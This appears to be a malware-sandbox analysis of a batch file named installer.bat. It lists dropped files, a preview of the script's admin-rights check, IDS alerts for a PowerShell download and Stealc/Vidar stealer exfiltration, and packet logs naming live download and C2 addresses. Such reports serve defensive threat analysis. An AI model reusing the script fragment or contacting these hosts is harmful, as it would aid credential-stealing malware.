SSDEEP:	48:8EdaTmWfIHaZidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbRy+yT+:8pTfGT/TbxWOvTbRy7T
MD5:	417842D923234E57B40F3F55929EC80C
SHA1:	DBA444C1517DB00DB601D1B41BF91491E94ABD4A
SHA-256:	C8EF576DF9756A857B19B02362F8CCC9DE403A07946435932A1415C1C3DE8E65
SHA-512:	5C052297EF784A7AFF686B4CFE615F91923F445017B927AB794B47950DF28F7325C187A2D7FDB2F1F9FAF5C533D5CFFFC1CD052BB35A70F585E0E8C7DBC5A84A
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....i..%X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y<1....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y<1....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y<1....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y<1..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y@1...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.o......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Chrome Cache Entry: 448

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (838)
Category:	downloaded
Size (bytes):	843
Entropy (8bit):	5.1873279851210965
Encrypted:	false
SSDEEP:	24:RW6ZjEtabNsH/BHslgT9lCuABATCuoB7HHHHHHHYqmffffffo:k6ZjEEsKlgZ01BAmuSEqmffffffo
MD5:	42D05CD6E8F6100037D8A764491E5932
SHA1:	C2BE2F833C7CEE85ACA7990AA8F16BDCAC713F72
SHA-256:	7F2ACB36D304DAA09B779BA6FA2612991CC6FAA064455974477461A78635CB94
SHA-512:	509043F6B8781150D464866ABB43C65108D6B5F5A2F394CFA6E27237E8348BC3D06404A1D5E8981F5CFAE39224BF1600284D773E8AD359806C34B5FC8826FB00
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["quantum computing stocks","culpa tuya movie release date","chargers vs new england patriots","tiktok banned","winter storm warning","nintendo switch 2 console","jujutsu infinite innate techniques","wells fargo bank settlement eligibility"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":7456083837069695639,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 449

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 450

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132747
Entropy (8bit):	5.436724719535078
Encrypted:	false
SSDEEP:	3072:fPkJQ7O4N5dTm+syHEt4W3XdQ4Q6quSr/nUW2i6o:fKQ7HTt/sHdQ4Q6qDfUW8o
MD5:	F7D04D147A8403B37AE2BFAF98BBF354
SHA1:	43D94A18DDE7546680A17DF90BA2A9D972D23875
SHA-256:	75EBF8E4E21A6723B0035B215B3D6F7EC7EE65B357C8C1B17F2A320CC6550772
SHA-512:	A58F15199B993E7FB58EFC58D89A9AD2559A208A84BDF42952D4C6CC049DBBE46F136324FCC4612145CE1DF7105895766A53D46A9E8C710C0EE359F20FAC35AE
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

\Device\Null

Download File

Process:	C:\Windows\System32\cacls.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	121
Entropy (8bit):	4.323081947925383
Encrypted:	false
SSDEEP:	3:ohAIQDMCZArMsxo2xRSvFFwIFMW3Gtvn:ohYD+82xmwIyHtv
MD5:	43B1EC1407EA9C0219A563FFFEEAE780
SHA1:	C42041802E99A95E6CBAE13E3E20EBFBA3237BB2
SHA-256:	7E5146BF6F0B6AA61AFD4E3A6031D6DEF0F37523A22D75086B8E0E21D22E4B16
SHA-512:	5307D7E089BEA4DAC250D0B606C80DF13CCA0A7ECB622BF61B37AD736FFC44EA68F9B993E4743F2AB220FF950E9D9B423524D4E10C0B2D1CE280A7D9B5095DE0
Malicious:	false
Preview:	C:\Windows\system32\config\SYSTEM NT AUTHORITY\SYSTEM:F .. BUILTIN\Administrators:F ....

Static File Info

General

File type:	DOS batch file, Unicode text, UTF-8 text
Entropy (8bit):	5.570224153070631
TrID:
File name:	installer.bat
File size:	1'455 bytes
MD5:	0991e63962884a922fd0e31aabc94bc3
SHA1:	a231220fed04e486db4df6bccd2b7f8214774195
SHA256:	1e1e6ba0072cc59ac0bea0fd4d9ce0ebb888c123e808e15523ad8d6bc75a9b03
SHA512:	425b663b2a700f884875e4e8ff9ca2413b3e9953307a899a81a6058108639d28a1bea5c2f89fec82275b4bd9226cad75ed1dc88420a43997a909f9bab2436435
SSDEEP:	24:x15pzHOwhdIzg4dP87XCyTgZ6OSH72cHV6h8unuA0+EqNIpyHIoi:5pNhdIz5FyltH4h8y6qNDK
TLSH:	FF3174220D694327112AE856C9011F45F4EEF1EB753C85B2B1356C79AD99380CBFFAC5
File Content Preview:	@echo off..:: BatchGotAdmin.:-------------------------------------.REM --> Check for permissions.>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"..REM --> If error flag set, we do not have admin..if '%errorlevel%' NEQ '0'

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T07:09:17.709947+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	1	192.168.2.5	49704	5.252.155.64	80	TCP
2024-12-27T07:09:17.710233+0100	1810003	Joe Security ANOMALY Windows PowerShell HTTP PE File Download	2	5.252.155.64	80	192.168.2.5	49704	TCP
2024-12-27T07:09:47.465207+0100	2859378	ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2	1	192.168.2.5	49766	188.245.216.205	443	TCP
2024-12-27T07:09:49.751673+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1	1	192.168.2.5	49771	188.245.216.205	443	TCP
2024-12-27T07:09:52.089057+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	188.245.216.205	443	192.168.2.5	49777	TCP
2024-12-27T07:09:54.485441+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	188.245.216.205	443	192.168.2.5	49783	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 07:09:00.243202925 CET	49674	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:09:00.243221045 CET	49675	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:09:00.362643003 CET	49673	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:09:09.852566957 CET	49674	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:09:09.852600098 CET	49675	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:09:09.977581024 CET	49673	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:09:12.463336945 CET	443	49703	23.1.237.91	192.168.2.5
Dec 27, 2024 07:09:12.463449001 CET	49703	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:09:16.101119995 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:16.236537933 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:16.236704111 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:16.240854979 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:16.360440016 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.709877968 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.709892988 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.709903002 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.709913969 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.709925890 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.709947109 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.710020065 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.710232973 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.710246086 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.710258007 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.710283041 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.710309029 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.710517883 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.710530043 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.710567951 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.829504013 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.829595089 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.829682112 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.833714962 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.833745956 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.833813906 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.842111111 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.842195988 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.842267036 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.850485086 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.850548983 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.850625992 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.858886957 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.858982086 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.859055042 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.867285967 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.867388010 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.867460012 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.875684023 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.875792980 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.875869989 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.884054899 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.884114981 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.884193897 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.892458916 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.892544985 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.892626047 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.900830030 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.900904894 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.900969028 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.949233055 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.949284077 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.949364901 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.953429937 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.953511000 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:17.953569889 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:17.961770058 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.008824110 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.019459009 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.019572973 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.019625902 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.023633957 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.023719072 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.024056911 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.032032013 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.032147884 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.032195091 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.040420055 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.040493011 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.040544987 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.048826933 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.048943996 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.049103975 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.057224989 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.057315111 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.057387114 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.065589905 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.065701962 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.065749884 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.074079990 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.074117899 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.074181080 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.082496881 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.082520962 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.082602024 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.090892076 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.090970993 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.091057062 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.094750881 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.094861984 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.094923019 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.098671913 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.098772049 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.098849058 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.102587938 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.102694035 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.102758884 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.106555939 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.106658936 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.106720924 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.110495090 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.110610008 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.110678911 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.114437103 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.114567995 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.114618063 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.128432989 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.128535032 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.128618956 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.139128923 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.139220953 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.139386892 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.141098976 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.196326971 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.230154991 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.230249882 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.230312109 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.231916904 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.232019901 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.232090950 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.235652924 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.235721111 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.236067057 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.239334106 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.239469051 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.240067005 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.242871046 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.242970943 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.244074106 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.246263027 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.246326923 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.248080969 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.249706984 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.249813080 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.252082109 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.253118038 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.253293037 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.256072998 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.256529093 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.256642103 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.259972095 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.260027885 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.260054111 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.263375998 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.263439894 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.263473988 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.263520002 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.266769886 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.266858101 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.266907930 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.269229889 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.269355059 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.269401073 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.271718979 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.271827936 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.272072077 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.274226904 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.274313927 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.274465084 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.276660919 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.276762962 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.276822090 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.279144049 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.279288054 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.280069113 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.281598091 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.281698942 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.284084082 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.284085989 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.284188032 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.286534071 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.286577940 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.286636114 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.286678076 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.289035082 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.289150000 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.289213896 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.291501999 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.291618109 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.292073011 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.293946981 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.294065952 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.296102047 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.296423912 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.296526909 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.298919916 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.298981905 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.298995972 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.299038887 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.301364899 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.301467896 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.301527023 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.303848982 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.303961992 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.304080009 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.306318045 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.306412935 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.308095932 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.308842897 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.308871984 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.311245918 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.311336994 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.440520048 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.440571070 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.440637112 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.441052914 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.441169024 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:18.441210985 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:18.443090916 CET	80	49704	5.252.155.64	192.168.2.5
